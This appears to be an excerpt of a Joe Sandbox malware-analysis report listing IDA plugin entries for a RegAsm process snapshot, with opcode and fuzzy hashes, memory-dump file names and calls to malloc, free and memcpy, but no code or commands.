                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4259248891-0
                                                                                                                                                                                                                                                    • Opcode ID: 61fcac67a67a0ccaf5f5a91cb7ced763e0d127cc60d4a6d184f7de8f1f190caf
                                                                                                                                                                                                                                                    • Instruction ID: 1917adc7645dd19c029bc2470371cf73c91644e8fe2eda3458ee78000ecaf292
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61fcac67a67a0ccaf5f5a91cb7ced763e0d127cc60d4a6d184f7de8f1f190caf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B831F671A1060A8FDB14CF2CCE806AA73E9FB84304F54813ED41AD7655EF35E659C7A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C6E0A4D), ref: 6C73B5EA
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C6E0A4D), ref: 6C73B623
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C6E0A4D), ref: 6C73B66C
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C6E0A4D), ref: 6C73B67F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1480856625-0
                                                                                                                                                                                                                                                    • Opcode ID: 5320f68411e2784fa74b3df48151d19d6be3da14ee1b2ff4473f6f95af116448
                                                                                                                                                                                                                                                    • Instruction ID: 951239175f981af80253c7eaf50f97d94cff026adfe97a74cd06c4f1db1f69c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5320f68411e2784fa74b3df48151d19d6be3da14ee1b2ff4473f6f95af116448
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE31E371A00626CFDB10CF68CD4465ABBB5EF84315F5A8579C80A9B203DB31F915CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C70F611
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C70F623
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C70F652
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C70F668
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                    • Instruction ID: cd2b267befd6c3ef1ba13411a1a71366a4a09db51454459495d1b7ee91532998
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA316FB1B00614AFC714CF1DCDC4A9B77F6EB84358B148539FA498BB05D631E9448B98
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6EB96F
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C6EB99A
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6EB9B0
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6EB9B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3313557100-0
                                                                                                                                                                                                                                                    • Opcode ID: a22fdee16068612c04cb31e2ae0290758d077825cb73279b58bad9f403f74250
                                                                                                                                                                                                                                                    • Instruction ID: cd98027cf27e0bc2d2b4bf941cf59c301cf8e32df183581b71885d39ddab9725
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22fdee16068612c04cb31e2ae0290758d077825cb73279b58bad9f403f74250
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6117CB1A003059FCB04DF69DC848ABB7F9BF88314B14853AE91AD7701E731A919CAA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d9f0aefac1935b949de0789300ff94a00180e6bded432c8b920602d00850ed5
                                                                                                                                                                                                                                                    • Instruction ID: 83dacde7dd31bad7ca10caa8c0a680ea5586655bb16c784bc3ddf88b0fe03fbb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d9f0aefac1935b949de0789300ff94a00180e6bded432c8b920602d00850ed5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF02DB37012005BE7009E18DC88E4773ADEF4522CB540035EA1AC3F02E736FD19C6A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%